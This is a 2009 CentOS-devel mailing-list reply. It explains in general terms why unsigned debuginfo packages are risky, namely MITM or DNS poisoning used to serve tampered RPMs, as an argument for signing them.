[CentOS-devel] why provide debuginfo

Fri Apr 10 18:29:01 UTC 2009
Pär Andersson <paran at nsc.liu.se>

Charlie Brady wrote:
> It's not obvious to me what the attack vector would be with unsigned 
> debuginfo packages...

1. Get people to download packages from you instead of the real 
debuginfo.centos.org by a MITM attack, DNS poisoning or whatever.

2. Send modified malicious packages instead of the real ones. Debuginfo 
packages are (AFAIK) ordinary RPM packages so they can contain evil 
binaries, install a rootkit in their post-install script or something 
like that.

/Pär